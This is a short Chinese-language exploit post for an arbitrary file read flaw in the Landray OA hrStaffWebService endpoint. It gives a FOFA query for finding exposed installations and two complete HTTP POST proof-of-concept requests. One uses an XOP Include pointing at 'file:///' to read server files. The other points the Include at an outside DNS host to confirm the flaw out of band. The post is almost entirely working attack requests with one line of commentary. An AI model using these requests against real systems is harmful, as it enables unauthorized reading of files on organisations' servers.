藍凌OA /sys/webservice/hrStaffWebService接口處存在任意文件讀取漏洞

FOFA

app="Landray-OA系統"

POC

• 文件讀取

POST /sys/webservice/hrStaffWebService HTTP/1.1
Host: 
Content-Type: multipart/related; boundary=----j0ofrwsv2dtllbzzkyh9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Content-Length: 619
Connection: close

------j0ofrwsv2dtllbzzkyh9
Content-Disposition: form-data; name="1"

<soapenv:Envelope xmlns:soapenv="" xmlns:web="http://webservice.staff.hr.kmss.landray.com/">
<soapenv:Header>
<soapenv:Body>
    <web:getHrStaffElements>
        <arg0>
            <beginTimeStamp>1</beginTimeStamp>
            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///"></xop:Include></count>
        </arg0>
    </web:getHrStaffElements>
</soapenv:Body>
</soapenv:Header>
</soapenv:Envelope>
------j0ofrwsv2dtllbzzkyh9--

• DNS帶外
  因為這個漏洞第一眼就覺得是XXE漏洞，然后就測試了下XXE的DNS帶外的方式。

POST /sys/webservice/hrStaffWebService HTTP/1.1
Host: 
Content-Type: multipart/related; boundary=----j0ofrwsv2dtllbzzkyh9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Content-Length: 598
Connection: close
SOAPAction: ""

------j0ofrwsv2dtllbzzkyh9
Content-Disposition: form-data; name="1"

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.staff.hr.kmss.landray.com/">
<soapenv:Header>
<soapenv:Body>
    <web:getHrStaffElements>
        <arg0>
            <beginTimeStamp>1</beginTimeStamp>
            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="http://dns網址"></xop:Include></count>
        </arg0>
    </web:getHrStaffElements>
</soapenv:Body>
</soapenv:Header>
</soapenv:Envelope>
------j0ofrwsv2dtllbzzkyh9--